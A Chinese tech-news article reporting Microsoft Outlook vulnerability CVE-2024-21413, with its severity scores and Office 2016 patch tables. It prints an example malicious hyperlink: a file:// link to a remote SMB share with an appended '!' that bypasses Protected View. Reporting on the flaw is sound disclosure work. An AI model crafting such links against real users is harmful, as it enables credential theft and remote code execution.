加个“!”就能读取、写入和删除文档,微软 Outlook 被曝出严重漏洞

2024-02-16 10:31IT之家 - 故渊

IT之家 2 月 16 日消息,微软近日发布安全公告,报告旗下的 Outlook 服务存在严重的远程代码执行漏洞,只需要在 Outlook 超链接中添加“!”感叹号,就能读取相关机密文档。

该漏洞追踪编号为 CVE-2024-21413,在 CVSS 风险评估中基础得分(根据漏洞的固有特征反映漏洞的严重程度)为 9.8(满分 10 分),时间得分(评价漏洞被利用的时间窗的风险大小)为 8.5 分(满分 10 分)。

该漏洞由 Check Point Research 的安全专家 Haifei  Li 发现并报告,根据微软官方描述,攻击者可以在文档扩展名及其嵌入链接后插入感叹号,就能绕过安全程序获得文档的高级权限,包括编辑潜在的恶意 "保护视图" 文档。

如果文档中嵌入了带有 http 或 https 的超链接,Outlook 就会启动默认浏览器来显示它。例如:

<a href="skype:SkypeName?call">Call me on Skype</a>

安全研究人员发现一个感叹号就足以绕过保护机制。下面的链接演示了这一点:

<a href="file///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

微软目前已经发布了 Office 补丁,修复了 CVE-2024-21413 漏洞,并推荐用户尽快安装。

用于 Office 2016(32 位版本)

产品文章下载内部版本号
Microsoft Office 2016(32 位版本)5002537安全更新16.0.5435.1001
Microsoft Office 2016(32 位版本)5002467安全更新16.0.5435.1001
Microsoft Office 2016(32 位版本)5002522安全更新16.0.5435.1001
Microsoft Office 2016(32 位版本)5002469安全更新16.0.5435.1001
Microsoft Office 2016(32 位版本)5002519安全更新16.0.5435.1001

For Office 2016(64 位版本)

产品文章下载内部版本号
Microsoft Office 2016(64 位版本)5002537安全更新16.0.5435.1001
Microsoft Office 2016(64 位版本)5002467安全更新16.0.5435.1001
Microsoft Office 2016(64 位版本)5002522安全更新16.0.5435.1001
Microsoft Office 2016(64 位版本)5002469安全更新16.0.5435.1001
Microsoft Office 2016(64 位版本)5002519安全更新16.0.5435.1001

IT之家附上该漏洞的更多相关链接,感兴趣的用户可以点击阅读:

广告声明:文内含有的对外跳转链接(包括不限于超链接、二维码、口令等形式),用于传递更多信息,节省甄选时间,结果仅供参考,IT之家所有文章均包含本声明。

文章价值:
人打分
有价值还可以无价值
置顶评论
    热门评论
      文章发布时间太久,仅显示热门评论
      全部评论
      一大波评论正在路上
        取消发送
        软媒旗下人气应用

        如点击保存海报无效,请长按图片进行保存分享